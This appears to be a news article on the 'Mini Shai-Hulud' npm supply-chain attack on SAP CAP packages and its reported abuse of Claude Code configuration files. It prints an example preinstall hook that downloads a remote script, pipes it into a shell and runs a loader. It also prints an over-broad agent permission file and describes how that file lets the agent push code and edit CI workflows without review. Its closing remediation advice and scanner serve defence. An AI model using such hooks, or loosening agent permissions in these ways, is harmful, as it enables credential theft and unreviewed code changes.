Morning Overview

A supply chain attack called ‘Mini Shai-Hulud’ poisoned official SAP packages and stole developer credentials through AI coding agent configs

On April 29, 2026, someone hijacked four widely used SAP packages on the npm registry, slipped credential-stealing malware into them, and then did something that, according to researchers at Mend.io, had not been publicly documented in a supply chain attack before: they weaponized an AI coding assistant’s configuration files to spread the infection across GitHub repositories automatically. Security researchers have since dubbed the attack “Mini Shai-Hulud,” after the sandworms in Frank Herbert’s Dune, and the name fits. The compromise burrowed through multiple layers of modern development infrastructure, from package manager to cloud platform to AI-powered agent, before anyone noticed it was there.

The four compromised packages belong to SAP's Cloud Application Programming Model (CAP), a framework enterprises use to build business applications on SAP's Business Technology Platform. Together, the packages had accumulated roughly 2.2 million downloads before the attack was detected. That number reflects total historical installs across npm (where download statistics are publicly verifiable through the npm registry's API), not unique developers or active deployments, but it establishes that these were not obscure libraries. They sat at the center of a widely adopted enterprise ecosystem.

How the attack worked


Researchers at StepSecurity and Aikido Security were among the first to dissect the compromise. The attacker used npm preinstall hooks, a standard lifecycle mechanism that runs automatically whenever a developer installs a package, to download the Bun JavaScript runtime and execute obfuscated malware on the victim’s machine. Because the malicious logic was not embedded in the package source code itself but fetched at install time through a secondary runtime, many traditional static analysis tools missed it entirely.
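
The hook mechanism is worth seeing concretely. The fragment below is a hypothetical illustration of the pattern the researchers describe, not the actual payload; the package name, URL, and script file are invented. The key detail is that the `preinstall` script fetches and runs code from outside the package, so nothing malicious appears in the published source:

```json
{
  "name": "example-compromised-package",
  "version": "1.4.2",
  "scripts": {
    "preinstall": "curl -fsSL https://example.invalid/get-bun.sh | sh && bun run ./loader.js"
  }
}
```

A scanner that only inspects the package's JavaScript files would see an innocuous `loader.js` stub; the real payload arrives through the secondary runtime at install time.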

Once running, the malware harvested cloud access tokens from environment variables and CI/CD secrets. Developers working on SAP CAP projects routinely store these credentials to authenticate with enterprise cloud systems. The stolen tokens were exfiltrated to attacker-controlled infrastructure, potentially giving the threat actor a foothold in corporate cloud environments far beyond the npm ecosystem.

The second vector is what makes Mini Shai-Hulud unusual. According to a detailed analysis by Mend.io, the attacker poisoned configuration files for Claude Code, Anthropic’s AI-powered coding assistant. Claude Code can be granted permissions to open pull requests and modify repository settings through its GitHub integration. By tampering with the agent’s config files, the attacker turned the AI tool into an unwitting propagation mechanism: it injected malicious continuous integration workflows into projects that used the compromised packages, allowing the tainted code to spread without direct human review.
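
To make the vector concrete: Claude Code reads project-level permission rules from settings files such as `.claude/settings.json`. The configuration below is an invented illustration of what an over-broad grant might look like, loosely following Anthropic's published rule syntax; it is not the attacker's actual payload, and the exact rules in the compromised configs have not been published. A project that ships rules like these lets the agent push commits and edit CI workflows without a human approving each action:

```json
{
  "permissions": {
    "allow": [
      "Bash(git push:*)",
      "Bash(gh pr create:*)",
      "Edit(.github/workflows/**)"
    ]
  }
}
```

Because these files live in the repository itself, a poisoned package that can write to the working tree can also rewrite the agent's boundaries, which is the gap Mini Shai-Hulud reportedly exploited.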

Analysis by OX Security found that stolen developer credentials surfaced in at least 1,200 GitHub repositories, many of them tied to enterprise SAP deployments. Each of those repositories became a potential entry point for further exploitation. OX Security described the credential leakage pattern but did not publish a full methodology or a standalone set of indicators of compromise (IOCs); the figures come from the firm's own analysis rather than a formal threat intelligence release. As researchers at RedRays noted, the combination of stolen cloud keys and compromised AI agents transformed what might have been a contained package incident into a broader failure spanning cloud infrastructure and developer automation.

What is still unknown


As of early June 2026, significant gaps remain in the public record. SAP has not released an official statement identifying which specific package versions were affected, how long the malicious code was live before detection, or what remediation the company has undertaken. The April 29, 2026 date cited across multiple research reports refers to when the compromise was detected by security researchers; whether the packages were actually poisoned on that date or at some earlier point has not been established. Without that disclosure, developers who installed updates on or around April 29 face the burden of conducting their own forensic review to determine whether their environments were compromised.

GitHub has not independently confirmed the 1,200-repository figure. OX Security’s count is based on the firm’s own analysis of where stolen credentials appeared, but the full methodology has not been published. The real number could be higher, since exfiltrated credentials that were not yet used publicly would not show up in that tally. It could also be lower in practical terms if some teams rotated their secrets before any exploitation occurred.

No one has publicly attributed the attack to a known threat actor or group. The “Mini Shai-Hulud” label was applied by researchers, not claimed by the attacker. Whether the operation was financially motivated, espionage-driven, or a proof-of-concept demonstration remains an open question. No affected enterprise has publicly reported data loss or unauthorized access from the stolen credentials, though that silence could reflect early-stage incident response, corporate reluctance to disclose, or exploitation that has not yet been detected.

Anthropic has not published a response addressing how Claude Code’s permission model was exploited or whether the company plans changes to its agent configuration security. That gap matters because the AI agent vector is the least independently verified aspect of the attack. Mend.io’s report describes the mechanism in detail, but without confirmation from Anthropic or independent replication, the full scope of AI-assisted propagation remains uncertain.

What the evidence supports


The technical analyses from StepSecurity, Mend.io, OX Security, RedRays, and Aikido Security represent the strongest available evidence. Each firm independently examined different facets of the attack based on direct artifact analysis, not secondhand summaries. Where their findings overlap, particularly on the April 29 date and the four-package scope, the corroboration strengthens confidence in those facts.

The confirmed behaviors are clear: malicious preinstall hooks downloaded an unexpected runtime, obfuscated payloads executed at install time, and cloud credentials were exfiltrated. The precise scale of downstream damage, the number of enterprises affected, and the full extent of AI agent exploitation are less certain and will likely shift as more organizations share their findings.

For developers and security teams, the immediate priorities are concrete. Anyone running SAP CAP projects should audit their npm dependencies for unexpected preinstall hooks, rotate cloud credentials stored in environment variables or CI/CD secrets, and review recent pull requests or CI workflow changes for unauthorized modifications. Teams that have granted AI coding agents write access to repositories should treat agent configuration files with the same rigor as any other automation credential, not as casual developer tooling settings.
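
The dependency audit can be partly automated. The sketch below, a minimal example rather than a complete scanner, walks an installed `node_modules` tree and reports every package that declares an install-time lifecycle script, so a reviewer can inspect each command for runtime downloads like the Bun fetch used in this attack. The function name is our own; adapt the hook list to your threat model:

```python
import json
from pathlib import Path

# Lifecycle scripts that npm runs automatically during `npm install`.
SUSPECT_HOOKS = {"preinstall", "install", "postinstall"}

def find_lifecycle_hooks(root: str) -> list[tuple[str, str, str]]:
    """Report (package name, hook name, script body) for every
    package.json under `root` that declares an install-time hook."""
    findings = []
    for manifest in Path(root).rglob("package.json"):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, OSError):
            continue  # skip unreadable or malformed manifests
        scripts = data.get("scripts")
        if not isinstance(scripts, dict):
            continue
        for hook in SUSPECT_HOOKS & scripts.keys():
            findings.append((data.get("name", str(manifest)), hook, scripts[hook]))
    return findings
```

A hook is not proof of compromise, since many legitimate packages compile native code at install time, but any script that pipes a remote download into a shell deserves immediate scrutiny.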

Why AI agents change the supply chain threat model


Mini Shai-Hulud’s most lasting significance may have less to do with SAP or npm and more to do with what it reveals about the expanding attack surface of AI-assisted development. For years, supply chain security focused on package registries, build systems, and CI/CD pipelines. This attack demonstrates that AI coding agents, which increasingly hold repository-level permissions and can push code changes autonomously, are now part of that same trust chain.

The question facing every organization that uses AI coding tools is whether their security posture has kept pace with the permissions those tools hold. An AI agent with write access to a repository is, from a security standpoint, another automated actor whose configuration files, access tokens, and behavioral boundaries need the same scrutiny as a CI bot or deployment service account. Mini Shai-Hulud exploited the gap between how developers think about AI assistants and how attackers think about them. Until that gap closes, it will not be the last attack to try.
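
One concrete way to apply that scrutiny on GitHub, assuming an organization already uses CODEOWNERS with branch protection, is to route changes to agent and CI configuration through mandatory human review. The team handle below is a placeholder:

```
# CODEOWNERS: require security review for automation and agent config.
# "@example-org/security-team" is a placeholder handle.
/.github/workflows/  @example-org/security-team
/.claude/            @example-org/security-team
```

With branch protection requiring code-owner approval, an automated actor, AI agent included, cannot quietly merge changes to its own permissions or to CI pipelines.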


*This article was researched with the help of AI, with human editors creating the final content.